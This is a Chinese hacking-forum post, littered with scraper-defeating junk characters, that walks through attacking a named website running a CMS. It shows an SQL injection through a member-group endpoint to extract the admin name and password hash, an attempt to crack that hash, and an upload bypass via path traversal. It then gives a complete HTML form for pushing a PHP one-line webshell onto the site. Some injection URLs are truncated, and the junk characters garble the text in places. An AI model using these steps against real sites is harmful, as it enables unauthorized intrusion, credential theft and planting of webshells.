①注入漏洞。
9 H( |# F- n$ A, O这站 http://www.political-security.com/
5 S8 V8 L* j% {+ o( v* e首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
0 {+ o+ p; g% w/ C; ]" F3 @ x0 C' Zwww.political-security.com/data/mysql_error_trace.inc 爆后台
6 ]" y) h& g% Q: c! s, z* z然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。0 y0 U- g) c4 k) |& q
然后写上语句 0 i- G: x6 Q9 L2 I7 c0 K/ \
查看管理员帐号
8 |( ?+ y8 c5 y: _5 e& E; Ehttp://www.political-security.co ... &membergroup=@`
% b2 t* L4 \& P* Z% q [( Z: z
. O# l1 H/ }) d8 P* wadmin 3 z. Z4 U2 L: V9 e8 u" R) f! R
- `9 ?/ Q( M: R! F/ m: y0 h
查看管理员密码
5 v6 O- B$ X1 r7 a+ g http://www.political-security.co ... &membergroup=@`
; @, g' \; s0 _# r) x* p% b( ]
7 G2 |9 c r$ ?/ c' o8d29b1ef9f8c5a5af4293 S8 |+ T5 q7 s6 c
7 M5 z- g1 x t查看管理员密码/ V, I% g1 ]0 s5 w
+ h4 O8 S; f# d) S
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# N" W! \* ^0 Z- I" f: h
. ^3 t0 S' ^4 D z8d2
: N( n7 B3 q! G4 @* u5 O1 f ]" c9b1ef9f8c5a5af42
. D& L O3 t( F9, h$ l+ t+ X& \9 k5 C( ?+ @
" m. Q2 L; Q, I1 h! N" q" h
cmd5没解出来 只好测试第二个方法1 k3 q" \3 C) m+ p
; V* Z- H( X* O `3 z% R! A# w Y z8 @. ?/ y4 e
②上传漏洞:3 V% ~7 }- p" |# U8 f, E
# G0 s% K: g! H/ j5 F
只要登陆会员中心,然后访问页面链接
/ x- F8 }; A; \“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 H6 W0 }8 X1 J9 T7 p
" ?7 q: P$ Y- G% J& z+ \如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
" s" N: G6 E" Z d6 D1 }. R' d" z% }; n3 d$ `
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm* J" e: M0 X" c$ n! p3 U
) Y2 ~) m; b5 U4 ?( o. E4 J
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
6 v6 B7 q4 i% N; \4 t或者% A) V" F0 q' Q5 p3 ^$ ^
即可上传成功 |